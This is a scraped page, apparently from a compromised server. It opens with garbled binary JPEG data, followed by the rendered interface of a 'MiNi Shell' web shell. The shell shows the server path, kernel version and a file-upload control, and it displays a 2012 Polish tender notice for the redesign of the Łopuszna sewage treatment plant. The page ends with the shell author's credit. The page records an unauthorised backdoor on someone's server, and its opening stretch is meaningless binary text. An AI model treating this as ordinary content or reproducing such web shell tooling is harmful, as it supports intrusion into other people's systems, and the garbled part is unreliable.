JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121212/263787-N-2012.html

<p class="kh_header"><b>Nowy Targ: Opracowanie dokumentacji projektowo - kosztorysowej dla rozbudowy i modernizacji oczyszczalni ścieków w Łopusznej</b><br>
<b>Numer ogłoszenia: 263787 - 2012; data zamieszczenia: 12.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Podhalańskie Przedsiębiorstwo Komunalne Sp. z o.o. , Al. Tysiąclecia 35A, 34-400 Nowy Targ, woj. małopolskie, tel. 018 2665242, 2640777, faks 018 2640779.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ppkpodhale.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej dla rozbudowy i modernizacji oczyszczalni ścieków w Łopusznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie dokumentacji projektowo-kosztorysowej dla Rozbudowy i modernizacji oczyszczalni ścieków w miejscowości Łopuszna i obejmuje:
1.1.	rozbudowę oczyszczalni do przepustowości Qdśr=1200m3/d, w tym niezbędna modyfikacja istniejącego reaktora (pomoc może stanowić koncepcja dotycząca powiększenia komory denitryfikacji  w oczyszczalni ścieków Łopuszna stanowiąca ZAŁĄCZNIK A do SIWZ),
1.2.	modernizację węzła mechanicznego w związku ze zwiększeniem przepustowości oczyszczalni do Qdśr=1200m3/d,
1.3.	zaprojektowanie nowej stacji odwadniania osadów w dwóch wariantach: jeden wariant z wirówką i zestawem do higienizacji osadu, drugi wariant z prasą ślimakową i zestawem do higienizacji osadu (wytyczne do projektowania stanowi załączona do SIWZ koncepcja dotycząca możliwości modernizacji węzła osadowego w oczyszczalni ścieków w Łopusznej - ZAŁĄCZNIK B),
1.4.	zaprojektowanie komory stabilizacji tlenowej osadu oraz stacji dmuchaw dla komory stabilizacji z niezbędnymi instalacjami - (wytyczne do projektowania zgodnie z ZAŁĄCZNIKIEM B),
1.5.	zaprojektowanie pomieszczenia ze stanowiskiem na kontener do odbioru osadu oraz pompowni osadu dowożonego wyposażonej w kratę koszową i składany żurawik z wyciągarką do pomp osadu- (wytyczne do projektowania zgodnie z ZAŁĄCZNIKIEM B),
1.6.	zaprojektowanie garaży o długości około 13,5m dla samochodów specjalistycznych typu MAN (dł. 9,6m, szer. 3,15m, wys. 3,9m) i STAR (dł. 6,7m, szer. 2,4m, wys. 3,4m) - (wytyczne do projektowania zgodnie z ZAŁĄCZNIKIEM B),
1.7.	zaprojektowanie automatycznej stacji zlewczej dla ścieków dowożonych,
1.8.	zaprojektowanie wymiany systemu sterowania i automatyki dla całej oczyszczalni, (wytyczne do projektowania zgodnie z ZAŁĄCZNIKIEM F)
1.9.	remont i dostosowanie do wymogów BHP pomieszczeń socjalnych i pozostałych pomieszczeń związanych z modernizacją oczyszczalni w zakresie uzgodnionym z Zamawiającym,
1.10.	zaadaptowanie istniejącego pomieszczenia , w którym aktualnie znajduje się workownica do odwadnia osadu (DRAIMAD) na archiwum  dla Podhalańskiego Przedsiębiorstwa Komunalnego Sp. z o.o.,
1.11.	zaprojektowanie rurociągu osadu z komory stabilizacji, który będzie transportował osad na projektowane laguny higrofitowe. Należało będzie zbilansować również odcieki powstające na lagunach - (planowane laguny zaznaczone na ZAŁĄCZNIKU C),
1.12.	zaprojektowanie wszystkich niezbędnych instalacji ogrzewania, wentylacji, elektrycznych i AKPiA, kanalizacyjnych, wodociągowych i burzowych ściśle związanych z modernizacją oczyszczalni ścieków,
1.13.	zweryfikowanie zapotrzebowania na wodę, która aktualnie pobierana jest ze studni i w razie niewystarczającej ilości, zaproponowanie ewentualnych modyfikacji lub zaprojektowanie nowego rozwiązania
1.14.	zaprojektowanie instalacji centralnego ogrzewania wraz z kotłownią na gaz/olej,
1.15.	zaprojektowanie wymiany urządzeń obecnie funkcjonujących na oczyszczalni
1.16.	poszczególne istniejące obiekty oczyszczalni zaznaczono na materiale graficznym stanowiącym ZAŁĄCZNIK D do niniejszej SIWZ.

Projekt winien zawierać szczegółowe rozwiązania techniczno-technologiczne wraz z doborem wielkości obiektów i urządzeń spełniających odpowiednie wymagania (dostosowanie do technologii oczyszczalni).
Na czas prowadzenia robót budowlanych należy przewidzieć również montaż zastępczych urządzeń w celu zachowania ciągłości prawidłowej pracy oczyszczalni, w taki sposób, aby zachować parametry technologiczne zgodne z pozwoleniem wodnoprawnym.
Teren inwestycji nie jest objęty miejscowym planem zagospodarowania przestrzennego.
Zamawiający dla części terenu oczyszczalni posiada ekspertyzę geotechniczną, która stanowi ZAŁĄCZNIK E do niniejszej SIWZ.   


2. Zakres rzeczowy obejmuje:
-	opracowanie dokumentacji projektowej dla wszystkich niezbędnych branż m. in. architektura, konstrukcja, instalacje wod.- kan., ogrzewanie, wentylacja, technologia oraz  instalacje elektryczne i AKPiA (projekt budowlany oraz  projekt wykonawczy)- po 6 egz.
-	opracowanie dokumentacji kosztorysowej (przedmiar robót + kosztorys inwestorski) zgodnie z obowiązującymi przepisami w szczególności ustawą prawo zamówień publicznych oraz rozporządzeniami wykonawczymi do niej - po 2 egz;
-	opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych - 2egz;
-	uzyskanie niezbędnych uzgodnień 
przygotowanie stosownych wniosków i uzyskanie koniecznych opinii, postanowień i decyzji w tym przeprowadzenie postępowania środowiskowego niezbędnych do uzyskania prawomocnego pozwolenia na budowę, 
-	inne niezbędne dokumenty i uzgodnienia potrzebne do uzyskania pozwolenia na budowę; 
-	wykonanie przez Wykonawcę własnym kosztem pełnej obsługi geodezyjnej geologicznej i geotechnicznej zadania (jeżeli ta, która znajduje się w posiadaniu Zamawiającego okaże się niewystarczająca) oraz mapy sytuacyjno-wysokościowe do celów projektowych w skali 1:500 z uwidocznieniem granic działek ewidencyjnych oraz dostarczenie powyższej dokumentacji w formie plików *.pdf na płycie DVD razem z oryginalnymi plikami projektowymi typu CAD (rozszerzenia typu *.dgn *.dwg lub *.dxf).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających polegających na powtórzeniu tego samego rodzaju zamówienia podstawowego w kwocie nie przekraczającej 50% wartości zamówienia podstawowego zgodnie z art. 67 ust. 1 pkt. 6) Ustawy Prawo zamówień publicznych z dnia 29 stycznia 2004 r. (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium
Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 
3 000 zł, słownie: trzy tysiące złotych
Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1.1 w pieniądzu, przelewem na rachunek bankowy: 
10 1540 1115 2043 6050 3428 0002
z adnotacją WADIUM - Opracowanie dokumentacji projektowo - kosztorysowej dla rozbudowy i modernizacji oczyszczalni ścieków w Łopusznej
1.2 w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
1.3 w gwarancjach bankowych, 
1.4 w gwarancjach ubezpieczeniowych 
1.5 w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z p. zm.) 

Termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego. 
W zakresie wadium obowiązują uregulowania Prawa Zamówień Publicznych zawarte w art. 45 i 46.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia przez Wykonawcę warunku jest:
- wykazanie doświadczenia Wykonawcy w zaprojektowaniu, w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, jednej oczyszczalni ścieków o przepustowości co najmniej Qdśr = 1000 m3/d.
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć wykaz wykonanych usług sporządzony według wzoru stanowiącego załącznik nr 2 do niniejszej SIWZ oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie z podaniem ich wartości oraz daty i miejsca wykonania (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie łącznie ich doświadczenie).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych wymagań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzeniem spełnienia przez Wykonawcę warunku jest: 
- dysponowanie osobą posiadającą zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. - Prawo budowlane uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń z wpisem na listę członków właściwej Okręgowej Izby Samorządu Zawodowego oraz doświadczenie w zakresie projektowania technologii oczyszczania ścieków na oczyszczalni ścieków o przepustowości nie mniejszej niż Qdśr= 1000m3/d
- dysponowanie osobą posiadającą zgodnie z przepisami ustawy z dnia 7 lipca 1994 r.-Prawo budowlane uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń z wpisem na listę członków właściwej Okręgowej Izby Samorządu Zawodowego
- dysponowanie osobą posiadającą zgodnie z przepisami ustawy z dnia  7 lipca 1994 r. - Prawo budowlane uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej bez ograniczeń z wpisem na listę członków właściwej Okręgowej Izby Samorządu Zawodowego
- dysponowanie osobami sprawdzającymi dla każdej z branż wymienionych powyżej, posiadającymi odpowiednie uprawnienia budowlane zgodnie z przepisami ustawy z dnia  7 lipca 1994 r. - Prawo budowlane i wpisanymi na listę członków właściwej Okręgowej Izby Samorządu Zawodowego.
- złożenie oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, zgodnie z załącznikiem nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza w tym zakresie szczegółowych wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się możliwość dokonania istotnych zmian postanowień zawartej umowy w sytuacji gdy:
1)	nastąpią istotne zmiany przepisów lub norm mających zastosowanie do przedmiotu zamówienia;
2)	nastąpią zmiany obowiązującej stawki VAT z tym, że wynagrodzenie netto pozostanie nie zmienione;
3)	zaistnieje potrzeba wykonania prac dodatkowych, nie objętych przedmiotem niniejszego zamówienia koniecznych do jego prawidłowego wykonania;
4)	zaistnieje istotna zmiana okoliczności powodująca, że wykonanie części przedmiotu zamówienia nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy;
5)	z przyczyn niezależnych od Wykonawcy nie można wykonać zadania w terminie w tym w szczególności ze względu na to, że:
- przedłużeniu uległy procedury administracyjne na etapie wydawania opinii, uzgodnień, postanowień i decyzji administracyjnych;
- nastąpił sprzeciw właścicieli terenu na prowadzenie prac przygotowawczych (pomiary geodezyjne, odkrywki geologiczne itp.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ppkpodhale.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Podhalańskie Przedsiębiorstwo Komunalne sp. z o.o.
Al. Tysiąclecia 35A
34-400 Nowy Targ
Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2012 godzina 08:45, miejsce: Podhalańskie Przedsiębiorstwo Komunalne sp. z o.o.
Al. Tysiąclecia 35A
34-400 Nowy Targ.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com